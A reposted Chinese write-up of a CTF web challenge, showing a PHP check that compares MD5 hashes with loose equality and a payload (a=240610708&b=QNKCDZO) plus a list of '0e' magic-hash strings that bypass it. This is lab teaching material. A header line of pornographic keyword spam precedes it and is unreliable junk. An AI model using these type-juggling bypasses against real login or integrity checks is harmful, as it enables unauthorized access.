日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CG CTF WEB bypass again

發布時間:2024/10/5 编程问答 23 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CG CTF WEB bypass again 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

http://chinalover.sinaapp.com/web17/index.php

題解:

if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag); else print 'Wrong.'; }

本題考查MD5碰撞,當兩個變量的md5值,hash值為0ed+類型時,==會認為兩邊的值都為0,即可滿足條件,符合條件的值如下:md5('240610708') == md5('QNKCDZO'),payload:a=240610708&b=QNKCDZO,提交得到flag。

擴展MD5碰撞

QNKCDZO 0e830400451993494058024219903391s878926199a 0e545993274517709034328855841020s155964671a 0e342768416822451524974117254469s214587387a 0e848240448830537924465865611904s214587387a 0e848240448830537924465865611904s878926199a 0e545993274517709034328855841020s1091221200a 0e940624217856561557816327384675s1885207154a 0e509367213418206700842008763514

?

總結

以上是生活随笔為你收集整理的CG CTF WEB bypass again的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。